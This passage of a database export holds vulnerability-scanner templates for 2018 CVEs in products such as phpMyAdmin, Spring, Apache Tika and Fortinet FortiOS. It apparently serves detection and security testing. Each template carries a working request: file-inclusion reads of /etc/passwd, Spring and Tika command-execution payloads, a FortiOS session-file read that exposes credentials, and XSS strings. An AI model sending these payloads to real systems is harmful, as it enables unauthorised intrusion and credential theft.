attacks.\n remediation: |\n Upgrade to a patched version of Seagate NAS OS.\n reference:\n - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12296\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-12296\n cwe-id: CWE-732\n epss-score: 0.01442\n epss-percentile: 0.86338\n cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: seagate\n product: nas_os\n tags: cve,cve2018,seagate,nasos,disclosure,unauth\n\nhttp:\n - raw:\n - |\n POST /api/external/7.0/system.System.get_infos HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}\n\n matchers:\n - type: word\n part: body\n words:\n - '\"version\":'\n - '\"serial_number\":'\n condition: and\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '\"version\": \"([0-9.]+)\"'\n part: body\n# digest: 4a0a00473045022060c783658faf40b7f9a34361eed36da0f94e1675b8f33ff246b9f4aeb1fb5154022100c74444ed55f597dff4be9289ccea933ff13cd951323438b922cd89b639507c63:922c64590222798bb761d5b6d8e72950", "hash": "55ef15fe2b8b230ac787f1094ae2e6cf", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308039" }, "name": "CVE-2018-12300.yaml", "content": "id: CVE-2018-12300\n\ninfo:\n name: Seagate NAS OS 4.3.15.1 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Seagate NAS OS 4.3.15.1 contains an open redirect vulnerability in echo-server.html, which can allow an attacker to disclose information in the referer header via the state URL parameter.\n impact: |\n Successful exploitation of this vulnerability could lead to user redirection to malicious websites, potentially resulting in the theft of sensitive information or the installation of malware.\n remediation: |\n Apply the latest security patches or updates provided by Seagate 
to fix the open redirect vulnerability in NAS OS 4.3.15.1.\n reference:\n - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12300\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-12300\n cwe-id: CWE-601\n epss-score: 0.00118\n epss-percentile: 0.45685\n cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: seagate\n product: nas_os\n tags: cve2018,cve,redirect,seagate,nasos\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a00473045022100b3dfe85d30990abdfc76926f79fc0972052a3bf24374013a6ed622a5fac500f402202ad50a628af7526e0eca73ed3a88133d9c9e4962c830fcc5b7e868563bedb40e:922c64590222798bb761d5b6d8e72950", "hash": "59cbd5cf766df5415c76df1c73ddbd5b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803a" }, "name": "CVE-2018-12613.yaml", "content": "id: CVE-2018-12613\n\ninfo:\n name: PhpMyAdmin <4.8.2 - Local File Inclusion\n author: pikpikcu\n severity: high\n description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. 
An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication).\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: |\n Upgrade PhpMyAdmin to version 4.8.2 or later to fix the vulnerability.\n reference:\n - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613\n - https://www.phpmyadmin.net/security/PMASA-2018-4/\n - https://www.exploit-db.com/exploits/44928/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12613\n - https://security.gentoo.org/glsa/201904-16\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2018-12613\n cwe-id: CWE-287\n epss-score: 0.97392\n epss-percentile: 0.99908\n cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phpmyadmin\n product: phpmyadmin\n tags: cve,cve2018,vulhub,edb,phpmyadmin,lfi\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009efa0514463053230c63b5f90705314d9e80a1a472ea48bb9da85b5c9779ee6402206c0ec7976f0ef1416debde9235f1b2a274324bd6782667980cd9288d6c90b06b:922c64590222798bb761d5b6d8e72950", "hash": "a95cc1978a2a4bdb211a979d573bdf87", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803b" }, "name": "CVE-2018-12634.yaml", "content": "id: CVE-2018-12634\n\ninfo:\n name: CirCarLife Scada <4.3 - System Log Exposure\n author: geeknik\n severity: critical\n description: CirCarLife Scada before 4.3 allows remote 
attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station.\n impact: |\n An attacker can gain access to sensitive system logs, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade CirCarLife Scada to version 4.3 or above to fix the system log exposure vulnerability.\n reference:\n - https://circontrol.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12634\n - https://www.seebug.org/vuldb/ssvid-97353\n - https://www.exploit-db.com/exploits/45384/\n - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-12634\n cwe-id: CWE-200\n epss-score: 0.95531\n epss-percentile: 0.99245\n cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: circontrol\n product: circarlife_scada\n tags: cve,cve2018,scada,circontrol,circarlife,logs,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/html/log\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"CirCarLife Scada\"\n\n - type: word\n words:\n - \"user.debug\"\n - \"user.info\"\n - \"EVSE\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ed0b29ad551cb1c8046e44ccfeb468882574d4d84131408c68bd1df5afd26cfa022075bd7e7320c9c33dad093dd40822990e12fc84791e76510619255948ce4ba1cd:922c64590222798bb761d5b6d8e72950", "hash": "50ec33432b2b3fc89c499c026b1e471c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803c" }, "name": "CVE-2018-12675.yaml", "content": "id: CVE-2018-12675\n\ninfo:\n name: SV3C HD Camera L Series - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: |\n SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an 
open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability.\n reference:\n - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory\n - https://vuldb.com/?id.125799\n - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12675\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-12675\n cwe-id: CWE-601\n epss-score: 0.00118\n epss-percentile: 0.44971\n cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sv3c\n product: h.264_poe_ip_camera_firmware\n tags: cve,cve2018,redirect,sv3c,camera,iot\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh'\n\n matchers:\n - type: word\n part: body\n words:\n - ''\n# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950", "hash": "9a8f34ff6a06ac984fccd021e29dea52", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803d" }, "name": "CVE-2018-1271.yaml", "content": "id: CVE-2018-1271\n\ninfo:\n name: Spring MVC Framework - Local File Inclusion\n author: hetroublemakr\n severity: medium\n description: Spring MVC Framework versions 5.0 prior 
to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead to a directory traversal attack.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches and updates provided by the Spring MVC Framework to mitigate this vulnerability.\n reference:\n - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d\n - https://pivotal.io/security/cve-2018-1271\n - https://access.redhat.com/errata/RHSA-2018:1320\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1271\n - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 5.9\n cve-id: CVE-2018-1271\n cwe-id: CWE-22\n epss-score: 0.004\n epss-percentile: 0.73113\n cpe: cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: vmware\n product: spring_framework\n tags: cve,cve2018,spring,lfi,traversal,vmware\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'\n - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'for 16-bit app support'\n\n - type: status\n status:\n - 200\n# digest: 
490a00463044022029c3380bdfd5118230de31f228fa1f4e5f2888d9bd277fe8ac5d3a84562a79f5022036b5eb64e2ed0675f3fc8179c9692ed6a466c35c7e8f0af65d4256edaec216c9:922c64590222798bb761d5b6d8e72950", "hash": "494155d026c6c9f9b4ae06518124b28b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803e" }, "name": "CVE-2018-1273.yaml", "content": "id: CVE-2018-1273\n\ninfo:\n name: Spring Data Commons - Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,\n and older unsupported versions, contain a property binder vulnerability\n caused by improper neutralization of special elements.\n An unauthenticated remote malicious user (or attacker) can supply\n specially crafted request parameters against Spring Data REST backed HTTP resources\n or using Spring Data's projection-based request payload binding that can lead to a remote code execution attack.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by the vendor to fix the deserialization vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1273\n - https://pivotal.io/security/cve-2018-1273\n - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E\n - https://www.oracle.com/security-alerts/cpujul2022.html\n - https://github.com/2lambda123/SBSCAN\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-1273\n cwe-id: CWE-20,CWE-94\n epss-score: 0.97515\n epss-percentile: 0.99982\n cpe: cpe:2.3:a:pivotal_software:spring_data_commons:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: pivotal_software\n product: spring_data_commons\n tags: 
cve,cve2018,vmware,rce,spring,kev,pivotal_software\n\nhttp:\n - raw:\n - |\n POST /account HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n Content-Type: application/x-www-form-urlencoded\n\n name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n\n payloads:\n command:\n - \"cat /etc/passwd\"\n - \"type C:\\\\/Windows\\\\/win.ini\"\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"\\\\[(font|extension|file)s\\\\]\"\n condition: or\n# digest: 4b0a00483046022100c4cebff0a87b2c4dac5a4d920694980041be72b0635587ca09347a4ef052fefe0221008e29bc099fb5b574cb1c5876f58f5bcbca1c78a5bbe2f82982b9d628b1dac77f:922c64590222798bb761d5b6d8e72950", "hash": "547c383f21a3be3473d517390f22edd4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30803f" }, "name": "CVE-2018-12909.yaml", "content": "id: CVE-2018-12909\n\ninfo:\n name: Webgrind <= 1.5 - Local File Inclusion\n author: DhiyaneshDk\n severity: high\n description: |\n Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI\n remediation: |\n Upgrade Webgrind to a version higher than 1.5 or apply the necessary patches provided by the vendor.\n reference:\n - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.md\n - https://github.com/jokkedk/webgrind/issues/112\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12909\n - https://github.com/KayCHENvip/vulnerability-poc\n - https://github.com/Miraitowa70/POC-Notes\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2018-12909\n cwe-id: CWE-22\n epss-score: 0.00466\n epss-percentile: 0.74979\n cpe: 
cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: webgrind_project\n product: webgrind\n fofa-query: app=\"Webgrind\"\n tags: cve,cve2018,lfi,webgrind,webgrind_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - 'root:.*:0:0:'\n - 'webgrind'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022039cf28a7d017785e7ae6c8930010bd0a7a23aba9ba82336e80ce2a2202500afd02203e606922ed51c242bc1ee629aa166cd3bd867dc4704ca230d421533b72b9223b:922c64590222798bb761d5b6d8e72950", "hash": "0898b75f03270afff7e72bf4e2005f83", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308040" }, "name": "CVE-2018-12998.yaml", "content": "id: CVE-2018-12998\n\ninfo:\n name: Zoho manageengine - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Zoho manageengine is vulnerable to reflected cross-site scripting. 
This impacts Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or update provided by Zoho ManageEngine to fix the XSS vulnerability.\n reference:\n - https://github.com/unh3x/just4cve/issues/10\n - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-12998\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-12998\n cwe-id: CWE-79\n epss-score: 0.96752\n epss-percentile: 0.99646\n cpe: cpe:2.3:a:zohocorp:firewall_analyzer:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: firewall_analyzer\n tags: cve,cve2018,zoho,xss,manageengine,packetstorm,zohocorp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ba108c11778581627bbeac85d1539af59abaf822ff9c7740b86c7444e5dace29022100e409b55ce3441b315844356936324f621eec8b39a5ec0b16303eedbc58d9467e:922c64590222798bb761d5b6d8e72950", "hash": "f3b7ce86d0f10ff2ec675b0ba7b129a7", "level": 
4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308041" }, "name": "CVE-2018-1335.yaml", "content": "id: CVE-2018-1335\n\ninfo:\n name: Apache Tika <1.1.8- Header Command Injection\n author: pikpikcu\n severity: high\n description: Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected server.\n remediation: Upgrade to Tika 1.18.\n reference:\n - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/\n - https://www.exploit-db.com/exploits/47208\n - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E\n - https://nvd.nist.gov/vuln/detail/CVE-2018-1335\n - http://packetstormsecurity.com/files/153864/Apache-Tika-1.17-Header-Command-Injection.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.1\n cve-id: CVE-2018-1335\n epss-score: 0.96734\n epss-percentile: 0.99585\n cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: tika\n tags: cve,cve2018,packetstorm,edb,apache,tika,rce,intrusive\n\nhttp:\n - method: PUT\n path:\n - \"{{BaseURL}}/meta\"\n\n body: var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");\n\n headers:\n X-Tika-OCRTesseractPath: cscript\n X-Tika-OCRLanguage: //E:Jscript\n Expect: 100-continue\n Content-type: image/jp2\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"Content-Type: text/csv\"\n\n - type: word\n part: body\n words:\n - org.apache.tika.parser.DefaultParser\n - 
org.apache.tika.parser.gdal.GDALParse\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100995e04bbc6df48317be210a749a2ac8a731b0e7bfa4d547e026075349e5190cc022100d0c88986a6df82ebc03e665d29d294e7d0ba57cdb72c09407727cee0689e6c0a:922c64590222798bb761d5b6d8e72950", "hash": "f665f043ac70dbd71a0a0dfe5e2834d6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308042" }, "name": "CVE-2018-13379.yaml", "content": "id: CVE-2018-13379\n\ninfo:\n name: Fortinet FortiOS - Credentials Disclosure\n author: organiccrap\n severity: critical\n description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).\n impact: |\n An attacker can obtain sensitive information such as usernames and passwords.\n remediation: |\n Apply the necessary patches or updates provided by Fortinet to fix the vulnerability.\n reference:\n - https://fortiguard.com/advisory/FG-IR-18-384\n - https://www.fortiguard.com/psirt/FG-IR-20-233\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2018-13379\n cwe-id: CWE-22\n epss-score: 0.97305\n epss-percentile: 0.99854\n cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fortinet\n product: fortios\n shodan-query: http.html:\"/remote/login\" \"xxxxxxxx\"\n tags: cve2018,cve,fortios,lfi,kev,fortinet\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\"\n\n matchers:\n - type: regex\n part: body\n regex:\n - '^var fgt_lang ='\n# digest: 
4b0a00483046022100ed688fb687003137454ccb27e917dd0a47b6effc89bb9404707395186fce0efd0221008586aa2b87390aed0dd185af0e8a536f991a73de918ddcad55a7bc3acfdbc0fe:922c64590222798bb761d5b6d8e72950", "hash": "6e868aa2dd36948594a80d8886764cc4", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308043" }, "name": "CVE-2018-13380.yaml", "content": "id: CVE-2018-13380\n\ninfo:\n name: Fortinet FortiOS - Cross-Site Scripting\n author: shelld3v,AaronChen0\n severity: medium\n description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allow an attacker to execute unauthorized malicious script code via the error or message handling parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Fortinet to fix this vulnerability.\n reference:\n - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html\n - https://fortiguard.com/advisory/FG-IR-18-383\n - https://fortiguard.com/advisory/FG-IR-20-230\n - https://nvd.nist.gov/vuln/detail/CVE-2018-13380\n - https://github.com/merlinepedra25/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-13380\n cwe-id: CWE-79\n epss-score: 0.00122\n epss-percentile: 0.46406\n cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: fortinet\n product: fortios\n tags: cve,cve2018,fortios,xss,fortinet\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B\"\n - 
\"{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"\"\n condition: or\n\n - type: word\n part: header\n negative: true\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206ce45dc62265ae4f6192bec17dcdd2579840de84d6a70b1d94b162f3c44d36300221009e122123ca302b8c7791dae1933312958f9d3f1e0e89daf77aaa2b2dd224bd2f:922c64590222798bb761d5b6d8e72950", "hash": "e0b4190a0ee46bf93a78828531179ed1", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308044" }, "name": "CVE-2018-13980.yaml", "content": "id: CVE-2018-13980\n\ninfo:\n name: Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion\n author: wisnupramoedya\n severity: medium\n description: Zeta Producer Desktop CMS before 14.2.1 is vulnerable to local file inclusion if the plugin \"filebrowser\" is installed because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Upgrade Zeta Producer Desktop CMS to version 14.2.1 or later to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/45016\n - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/\n - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2018-13980\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 5.5\n cve-id: CVE-2018-13980\n cwe-id: CWE-22\n epss-score: 0.0018\n epss-percentile: 0.5428\n cpe: cpe:2.3:a:zeta-producer:zeta_producer:*:*:*:*:*:*:*:*\n 
metadata:\n max-request: 1\n vendor: zeta-producer\n product: zeta_producer\n tags: cve2018,cve,lfi,edb,packetstorm,zeta-producer\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220228e9d192f56704740750f3a51ad746dcfc7ca200431ce286c6b232e1803320e022100e58e67a71cef0a53f5d448ad997bd96cc2c3380c4a78a356c1af321cd3367885:922c64590222798bb761d5b6d8e72950", "hash": "5a9d788cb05774cddc52f101c609efb9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308045" }, "name": "CVE-2018-14013.yaml", "content": "id: CVE-2018-14013\n\ninfo:\n name: Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a version of Synacor Zimbra Collaboration Suite Collaboration that is equal to or greater than 8.8.11 to mitigate the vulnerability.\n reference:\n - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n - https://bugzilla.zimbra.com/show_bug.cgi?id=109018\n - https://bugzilla.zimbra.com/show_bug.cgi?id=109017\n - https://nvd.nist.gov/vuln/detail/CVE-2018-14013\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2018-14013\n cwe-id: CWE-79\n epss-score: 0.00755\n epss-percentile: 0.80655\n cpe: 
